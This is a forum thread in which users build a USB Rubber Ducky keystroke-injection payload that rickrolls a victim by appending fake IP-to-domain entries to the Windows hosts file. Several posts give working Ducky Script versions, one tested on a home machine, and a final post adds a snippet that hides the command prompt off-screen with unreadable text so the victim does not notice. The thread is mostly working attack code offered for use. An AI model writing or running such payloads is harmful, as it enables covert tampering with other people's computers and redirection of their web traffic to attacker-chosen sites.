Jump to content

[Question] The Duck and HowTo Rick-Role?


zac115
 Share

Go to solution Solved by overwraith,

Recommended Posts

so dose any one here think that it is possible to bring the rick role from the pineapple and the fast typing of the duck and put them together so when a person trys to surf they will always see rick astley and hear his song

Edited by zac115
Link to comment
Share on other sites

your probably looking at editing the c:\windows\system32\drivers\etc\hosts file, and mapping hostnames www.(google/facebook/hotmail/twitter).com to an ip, that has a rickroll as an index page.

You'll need admin user privs to pull it off.

Link to comment
Share on other sites

your probably looking at editing the c:\windows\system32\drivers\etc\hosts file, and mapping hostnames www.(google/facebook/hotmail/twitter).com to an ip, that has a rickroll as an index page.

You'll need admin user privs to pull it off.

You can do this with just the Pineapple using dnsspoof. Or are you talking about using just the ducky?

well i dont have a pinapple pineapple but i do have a rubber ducky so can you guys give me a example of a ducky script for it

Link to comment
Share on other sites

Local DNS Poisioning/Spoofing

IP_ADDRESS is the IP address of the website you want the victim to be directed to.

DOMAIN_NAME is the domain name (Web page) you want the victim to type in.

REM Typing in the command prompt. Appending to the end of the hosts file. 

STRING echo "IP_ADDRESS

TAB

STRING DOMAIN_NAME">> C:\Windows\System32\drivers\etc\hosts

ENTER

Should look more or less like this typed into cmd prompt:

echo "IP_ADDRESS          DOMAIN_NAME" >> C:\Windows\System32\drivers\etc\hosts

I haven't tested this script yet, should be a good enough proof of concept though.

Edited by overwraith
Link to comment
Share on other sites

The hosts file only requires a space, not a tab. I have not tried on the ducky yet, but from cmd, echo. >> c:\windows\system32\drivers\etc\hosts will append a carriage return to ensure you are on a new line and echo IP DOMAIN >> c:\windows\system32\drivers\etc\hosts will append your desired entry

Link to comment
Share on other sites

  • Solution

Cool, I've just been introduced to the hosts file, and had no idea that a space would work also. So a working version of what I posted above would look like:

REM Typing in the command prompt. Appending to the end of the hosts file. 

REM Enter a newline before we enter our false IP address/Domain Name

STRING echo. >> c:\windows\system32\drivers\etc\hosts

ENTER

REM With a space between IP_ADDRESS and DOMAIN_NAME

STRING echo IP_ADDRESS DOMAIN_NAME >> C:\Windows\System32\drivers\etc\hosts

ENTER

And for anyone who wants to know a websites IP address, just type ping www.website.com into the command prompt to determine the websites IP address.



			
				


	Edited  by overwraith
	
	

			
		
Link to comment
Share on other sites

here is a payload i tested on my personal computer on lunch (i live close enough to work to go home and eat)

DELAY 3000
GUI d
DELAY 50
GUI r
DELAY 50
STRING cmd
DELAY 50
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER

it mapped admin.com to my home router. it probably doesn't require all the delays, but they dont hurt anything and i was writing on my work computer so i didnt have a way to test timing of commands

Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

Here is a duck script that I usually paste at the beginning of my duck scripts. I modified it based on what somebody else suggested in the Duck community for hiding the command prompt, and making the text so it is hard to read even if they do see the command prompt. When you run it the ducky quickly hides the command window below the bottom of your screen. Should work for Windows 7 and Vista.

CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...